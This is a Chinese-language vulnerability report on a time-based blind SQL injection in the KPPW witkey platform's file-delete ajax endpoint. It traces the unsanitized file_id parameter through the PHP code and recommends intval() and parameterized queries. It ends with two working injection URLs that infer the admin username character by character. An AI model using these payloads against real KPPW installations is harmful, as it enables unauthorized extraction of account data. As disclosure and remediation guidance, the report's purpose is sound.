### 简要描述:

kppw威客系统SQL盲注漏洞

### 详细说明:

文件: /control/ajax/ajax_file.php

```php
case "delete":
    $res = keke_file_class::del_att_file($file_id, $filepath);
    $res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' );
    die ();
    break;
```

进入 del_att_file 函数:

```php
static function del_att_file($fid = 0, $filepath = '', $del_more = '') {
    $file_obj = new Keke_witkey_file_class ();
    if ($fid > 0) {
        $where = 'file_id=' . $fid;
        $filepath != '' && $where .= ' and save_name="' . $filepath . '"';
        $file_obj->setWhere ( $where );
        $file_info = $file_obj->query_keke_witkey_file ();
        $file_obj->setWhere ( $where );
        $res = $file_obj->del_keke_witkey_file ();
        $filepath = $file_info [0] ['save_name'];
        if (is_file ( $filepath )) {
            $unlink = unlink ( $filepath );
            if ($del_more != '') {
                $more_name = array ();
                $dirname = dirname ( $filepath );
                $dirname = $dirname . '/';
                $basename = basename ( $filepath );
                $size_arr = explode ( ',', $del_more );
                for($i = 0; $i < sizeof ( $size_arr ); $i ++) {
                    unlink ( $dirname . $size_arr [$i] . '_' . $basename );
                }
            }
        }
        return $unlink ? $unlink : $res;
    }
```

进入 query_keke_witkey_file 函数:

```php
function query_keke_witkey_file($is_cache=0, $cache_time=0){
    if($this->_where){
        $sql = "select * from $this->_tablename where ".$this->_where;
    } else{
        $sql = "select * from $this->_tablename";
    }
    if ($is_cache) {
        $this->_cache_config ['is_cache'] = $is_cache;
    }
    if ($cache_time) {
        $this->_cache_config ['time'] = $cache_time;
    }
    if ($this->_cache_config ['is_cache']) {
        if (CACHE_TYPE) {
            $keke_cache = new keke_cache_class ( CACHE_TYPE );
            $id = $this->_tablename . ($this->_where?"_" .substr(md5 ( $this->_where ),0,6):'');
            $data = $keke_cache->get ( $id );
            if ($data) {
                return $data;
            } else {
                $res = $this->_dbop->query ( $sql );
                $keke_cache->set ( $id, $res,$this->_cache_config['time'] );
                $this->_where = "";
                return $res;
            }
        }
    }else{
        $this->_where = "";
        return $this->_dbop->query ( $sql );
    }
}
```

在拼接SQL语句时:

```php
$where = 'file_id=' . $fid;
$sql = "select * from $this->_tablename where ".$this->_where;
```

file_id 没有过滤，导致 SQL 注入：`$fid` 未经整型转换或转义就以字符串拼接方式进入 where 条件，而同一条件中的 `$filepath` 也以同样方式拼接，应一并处理。修复建议：对 `$fid` 做 `intval()` 处理，并改用参数化查询（或对字符串条件做转义）。

### 漏洞证明:

利用证明:

```
http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x61,sleep(5), 1)%23&filepath=123
```

返回正常。

```
http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x62,sleep(5), 1)%23&filepath=123
```

返回错误，延迟 5 秒后返回。